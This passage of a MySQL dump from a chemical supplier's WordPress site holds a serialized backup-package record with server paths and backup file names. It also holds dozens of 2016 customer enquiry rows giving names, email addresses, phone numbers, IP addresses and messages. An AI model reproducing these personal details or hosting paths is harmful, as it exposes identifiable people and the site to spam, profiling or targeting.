:34:"DUP_Archive_Filter_Scope_Directory":4:{s:7:"Warning";a:0:{}s:10:"Unreadable";a:0:{}s:4:"Core";a:0:{}s:8:"Instance";a:0:{}}s:5:"Files";O:29:"DUP_Archive_Filter_Scope_File":5:{s:4:"Size";a:0:{}s:7:"Warning";a:0:{}s:10:"Unreadable";a:0:{}s:4:"Core";a:0:{}s:8:"Instance";a:0:{}}s:4:"Exts";O:29:"DUP_Archive_Filter_Scope_Base":2:{s:4:"Core";a:0:{}s:8:"Instance";a:0:{}}s:9:"UDirCount";i:0;s:10:"UFileCount";i:0;s:9:"UExtCount";i:0;}s:10:"\0*\0Package";r:1;}s:9:"Installer";O:13:"DUP_Installer":12:{s:4:"File";s:78:"20161020_millerstephensonchemicals_5808b0396e3dc6428161020115329_installer.php";s:4:"Size";i:0;s:10:"OptsDBHost";s:0:"";s:10:"OptsDBPort";s:0:"";s:10:"OptsDBName";s:0:"";s:10:"OptsDBUser";s:0:"";s:12:"OptsSSLAdmin";i:0;s:12:"OptsSSLLogin";i:0;s:11:"OptsCacheWP";i:0;s:13:"OptsCachePath";i:0;s:10:"OptsURLNew";s:0:"";s:10:"\0*\0Package";O:11:"DUP_Package":23:{s:7:"Created";s:19:"2016-10-20 11:53:29";s:7:"Version";s:6:"1.1.18";s:9:"VersionWP";s:5:"4.6.1";s:9:"VersionDB";s:6:"5.5.43";s:10:"VersionPHP";s:6:"5.4.42";s:9:"VersionOS";s:5:"Linux";s:2:"ID";N;s:4:"Name";s:34:"20161020_millerstephensonchemicals";s:4:"Hash";s:29:"5808b0396e3dc6428161020115329";s:8:"NameHash";s:64:"20161020_millerstephensonchemicals_5808b0396e3dc6428161020115329";s:4:"Type";i:0;s:5:"Notes";s:0:"";s:9:"StorePath";s:67:"/home/content/p3pnexwpnas01_data03/33/3601733/html/wp-snapshots/tmp";s:8:"StoreURL";s:46:"http://www.miller-stephenson.com/wp-snapshots/";s:8:"ScanFile";N;s:7:"Runtime";N;s:7:"ExeSize";N;s:7:"ZipSize";N;s:6:"Status";N;s:6:"WPUser";N;s:7:"Archive";r:22;s:9:"Installer";r:53;s:8:"Database";O:12:"DUP_Database":12:{s:4:"Type";s:5:"MySQL";s:4:"Size";i:12094728;s:4:"File";s:77:"20161020_millerstephensonchemicals_5808b0396e3dc6428161020115329_database.sql";s:4:"Path";N;s:12:"FilterTables";s:0:"";s:8:"FilterOn";i:0;s:4:"Name";N;s:10:"Compatible";s:0:"";s:10:"\0*\0Package";r:1;s:25:"\0DUP_Database\0dbStorePath";s:145:"/home/content/p3pnexwpnas01_data03/33/3601733/html/wp-snapshots/tmp/20161020_millerstephensonchemicals_5808b0396e3dc6428161020115329_database.sql";s:23:"\0DUP_Database\0EOFMarker";s:0:"";s:26:"\0DUP_Database\0networkFlush";b:0;}}}s:8:"Database";r:88;}');
#
# End of data contents of table `wp_duplicator_packages`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_enquiry_detail_new`


#
# Delete any existing table `wp_enquiry_detail_new`
#

DROP TABLE IF EXISTS `wp_enquiry_detail_new`;


#
# Table structure of table `wp_enquiry_detail_new`
#

CREATE TABLE `wp_enquiry_detail_new` (
  `enquiry_id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `email` varchar(75) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `message` varchar(500) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `phone_number` varchar(16) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `subject` varchar(50) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `enquiry_ip` varchar(35) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `product_details` longtext COLLATE utf8mb4_unicode_ci,
  `enquiry_date` datetime DEFAULT NULL,
  `expiration_date` datetime DEFAULT NULL,
  `pdf_deleted` bigint(20) DEFAULT NULL,
  `product_sku` varchar(35) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `enquiry_hash` varchar(75) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `order_id` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `total` int(50) DEFAULT NULL,
  `date_field` datetime DEFAULT NULL,
  `old_product_details` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`enquiry_id`),
  UNIQUE KEY `enquiry_hash` (`enquiry_hash`)
) ENGINE=MyISAM AUTO_INCREMENT=1424 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_enquiry_detail_new`
#
 
INSERT INTO `wp_enquiry_detail_new` VALUES (1, 'Chris Pavlik', 'cpavlik@mschem.com', 'Do not respond', '2032222222', 'Test', '107.3.77.7', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"347";s:5:"title";s:7:"GPL 200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_153282266.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-27 15:12:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (2, 'Nick Annese', 'nick.annese@gentex.com', 'My name is Nick Annese and I represent Gentex Corporation. I was wondering if it is possible for me to get a sample of this cleaner? We are currently shooting Urethane into Aluminum molds to create vac cups. We use a Hydrocarbon release and we need some way to clean it up. Please let me know if it is possible for us to get a sample.\n\nThank You,\nNick Annese', '6167721800', 'Sample to Remove Hydrocarbon Release', '204.19.223.246', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1711";s:5:"title";s:26:"PFPE Re-Move™ MS 250/252";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-250.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-27 19:13:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (3, 'Alex Kong', 'AlexKong@conmeta.com', 'please advise price quotation on MS-122XD, 2 cans ', '2012655929', 'RFQ', '24.189.4.234', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-27 21:22:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (4, 'Tom', 'thomasgregorynelson@shaw.ca', 'Hello\nLooking to buy 0.5 ounce (or so) squeeze tube of GPL 105.  May I request price and availability?\nThank-you\nTom', '403-271-3254', 'Krytox GPL 105 - very small qty', '174.0.61.56', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"440";s:5:"title";s:7:"GPL 105";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-28 02:46:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (5, 'hienautotech', 'hienautotech@gmail.com', 'I have a prolem stick mold in 500 c', '84967066664', 'I need buy in vietnam', '113.185.53.46', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:8:"MS-153BN";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-28 15:24:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (6, 'Lauren Dupuis', 'lauren@dupuis.org', 'Hello,\nI would like to get a quote for an 8 oz bottle of Krytox 157 FSH.\nThanks,\nLauren', '4062535750', 'Krytox 157 FSH', '174.45.105.185', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-29 02:16:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (7, 'Jacob  Shanafelt', 'animal4542@msn.com', 'I would like pricing on the product,  GPL-226 Krytox Lubricants .5kg.\n Thank you.', '618-231-5491', 'Gpl- 226', '174.221.133.14', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-29 06:35:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (8, 'scott gater', 's.gater@itech-instruments.com', 'Like price and delivery for 1 bottle of Epon 828 and EPI-CURE 3140  16oz', '6099247310', 'Resin 828 / EPI Cure 3140', '73.10.187.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-29 11:26:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (9, 'Tom Montelli', 'tom.montelli@aero.bombardier.com', 'Need to know Price Quote &amp; Delivery of part number MS-143H  PTFE Release Agent Liquid Form. Has it been replaced? Could not find it in Web Site. Please advise. Thank you', '514-855-2739', 'Price Quote &amp; Delivery', '10.88.84.33', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"305";s:5:"title";s:8:"MS-143AX";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143AX-.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-29 12:25:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (10, 'Amy Zhao', 'azhao@gvdcorp.com', 'Hi,\n\nI\\\'m interested in purchasing some small (1-2oz) samples of Krytox GPL 100, GPL 103, and 1506. Our company has purchased these from you in the past and would just like to buy some more. \n\nThanks,\nAmy', '8603289249', 'Krytox 103, 100, 1506 oil inquiry', '173.9.126.185', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-29 16:46:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (11, 'Mindy Simon', 'simon27@llnl.gov', 'Hello,\n\nI\\\'d like a quote for some of your Krytox 157 FSL products. A 4 oz size in any type of dispenser would be ideal.\n\nThanks,\nMindy', '925-423-4209', '157 FSL', '128.115.190.40', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-29 21:30:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (12, 'Joe Brady', 'joe@brady-solutions.com', 'I\\\'d like to know how much this product is and where I can buy it.  I went to the site to find out where to buy your TFE release agent dry lubricant.  That stuff is unbeatable.', '4023057370', 'Ultra Pure specialty fluid', '98.172.143.159', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1834";s:5:"title";s:7:"MS-752U";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-752U.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-29 23:33:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (13, 'Ismail Hajji', 'ismail.hajji@curie.fr', 'Hello,\n\nI am Ismail Hajji from Institut Curie, Paris.\nI would like to ask for a quotation for the krytox 157 FSH.\n\nThank you in advance for your answer.\n\nSincerely,\nIsmail Hajji\n\n', '', 'Quotation', '193.54.90.194', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-30 08:56:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (14, 'Max chavez', 'Maxchavez@sbcglobal.net', 'What curing agent would be best with 828. I am encapsulating electronic components . Cure time 14 hrs shore hardness 90-100A viscosity thin.   I have used your epon 8132 with epikure 3274 this combination works good my only issue with it it takes to long to cure .  Look forward to your earliest reply.', '702-203-7665', 'Epon 828', '71.2.65.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-30 10:55:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (15, 'Joey Beall', 'jbeall@subcom.com', 'Need pricing on two 5-gallon pails of Opteon Sion cleaning agent.\n\nThanks', '4107832243', 'RFQ', '198.175.154.212', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-30 11:12:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (16, 'Barbara Pascalm', 'barbara.pascal@yahoo.co', '5 syringes .5 oz. Dupont LVP Krytox\nplease quote best price and availability\nthank you\nsincerely\nBarbara Pascal\nCPS International LLC\nNJ', '2013415200', 'request for quote', '69.112.78.28', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"862";s:5:"title";s:3:"LVP";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_22381852.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-30 14:46:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (17, 'Ray Wainwright', 'raymond.n.wainwright.ctr@navy.mil', 'I would like to get a quote for 1 case of MS-222N.  And then a separate quote for 10 cases.  How many cans come in 1 case?\n\nAre you GSA approved? \n\nThank you for your help.\nRegards,\nRay Wainwright ', '', 'MS-222N', '138.162.0.41', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-09-30 16:48:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (18, 'Daniela Iguchi', 'dxi45@case.edu', 'Hello,\n\nI would like to know the price and sizes availables for EPON 825 and EPON 828.\n\nThank you,\n\nBest regards,\n\nDaniela Iguchi', '', 'Quotation', '129.22.1.19', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"842";s:5:"title";s:11:"EPON™ 825";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-02 20:07:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (19, 'Simon Harris', 'sdh@jjpowell.com', 'I\'m looking to buy this product and was wondering what sizes it comes in and what the price would be?', '8145533473', 'How to buy', '173.163.21.57', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"814";s:5:"title";s:7:"GPL 207";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_230407642.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-03 14:10:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (20, 'Jen Curit', 'jcurit@seirra-peaks.com', 'Please quote price and delivery for EPON resin 828\nThank you,\n\nJen Curit\nAdministrative Lead/HR Coordinator\nCamden Site\nSierra Peaks Tibbetts\nPhone: 207-236-3301 ext. 1600\nFax: 207-236-3303\nemail: jcurit@sierra-peaks.com\nwww.sierrapeakstibbetts.com\n', '2072363301', 'quote request', '72.45.165.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-03 18:47:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (30, 'Cody Greene', 'codyg@treemen.com', 'We are a small molding shop and are interested in switching to a higher temp grease.', '3309653777', 'Looking for pricing', '24.101.177.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"697";s:5:"title";s:7:"XHT-BDX";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_105938183.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-04 17:54:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (27, 'Yen', 'sales@burnaby-tech.com', 'Dear Sir and Madame,\n\nPlease quote the following part number,\n\n\n1. GPL-207  8Oz\n     QTY: 21 EA\n\nPlease provide the lead time of the product.\n\n\nThanks\n', '', 'RFQ - GPL-207 8Oz', '61.56.239.224', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"814";s:5:"title";s:7:"GPL 207";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_230407642.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-04 01:51:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (28, 'Bill Wix', 'BWIX@Techmaster.us', 'Just to confirm that this is the "CONTACT RE-NU &amp; LUBE? Please quote a price per can and if there is a minimum order. I need to have this pre-approved, prior to actually placing the order.  Thanks, Bill', '7605360227', 'MS-538N', '98.187.248.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1836";s:5:"title";s:7:"MS-538N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/electrical-contact-lubricant-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-04 12:32:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (29, 'Mark Rossetto', 'mark.a.rossetto@gm.com', 'need a quote if I can purchase directly from you', '2484647404', 'aeroduster', '198.208.251.21', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-04 13:36:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (31, 'Kazuri Arai', 'gmleng@massenburg.com', 'Hello,\nWe\'d like to inquire about price and availability for MS-475C.  We\'d like to order 6 cans as soon as possible.  We\'d appreciate it very much if you could get back to us on how we could place an order.  \n\nThank you.  \nKazuri\nGML, LLC', '6156691465', 'Price/Lead Time Inquiry ', '68.47.243.9', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"621";s:5:"title";s:7:"MS-475C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-475C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-04 23:32:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (32, 'kevin gaw', 'kevin.o.gaw@boeing.com', 'need the MSDS for this product, Miller Stephenson MS-260 Safezone ', '5757709090', 'Miller Stephenson MS-260 Safezone ', '130.76.24.29', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-04 23:47:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (33, 'Guillermo Rivera', 'procurement@bfsmanufacturing.org', 'Would you please provide me with a formal quote for LUBRICANT, MOLD RELEASE - MS-122AD ?\n\nI really appreciate your assistance.\n\n', '5203648500', 'Quotation', '174.30.151.58', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-05 01:12:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (34, 'TJ Bedore', 'bedoretj@yahoo.com', 'I need some of this to dissolve PLA plastic for a science experiment in school', '', '', '107.0.69.23', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-05 13:37:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (35, 'Leslie Dye', 'ldye@american-usa.com', 'I am trying to reorder the VERTREL XF Cleaning Agent and our purchasing department cannot seem to get a part number to get it ordered.  Can you please help me out?', '2053258983', 'Reorder of XF cleaning agent', '207.223.116.5', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-05 14:25:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (36, 'Matthew Crall', 'matt-crall@utulsa.edu', 'I\'m looking to buy 2-3 containers of this and was wondering what the cost would be. It\'s for research purposes at the University of Tulsa. ', '5017869911', 'EPON 828 resin', '129.244.56.30', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-05 16:56:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (37, 'Charlie Bergmann Jr', 'Charlie@beyondgreenairservices.com', 'Have bought MS-260 in the past, it was $5.35ish a can. Is there a concentrated version we can get instead? We went through this one too fast', '', 'Price Request', '68.193.177.246', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:15:"Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-05 18:01:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (38, 'Justin OBrien', 'justin.obrien@linamar.com', 'Good Afternoon;\n\nDo you have any Canadian retailers I can order this item from?\n\nThanks, \nJustin O\'Brien', '5198373055', 'Information needed for Aero-duster', '206.186.133.226', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-05 20:20:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (39, 'STEVEN JOHNSTON', 'steven.johnston@elbitsystems-us.com', '1 QUART', '2564802312', 'REQUEST FOR QUOTE', '76.195.112.218', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"738";s:5:"title";s:7:"MS-472S";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-472S.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-06 13:16:18', '', NULL, '', '', '', NULL, '', ''); 
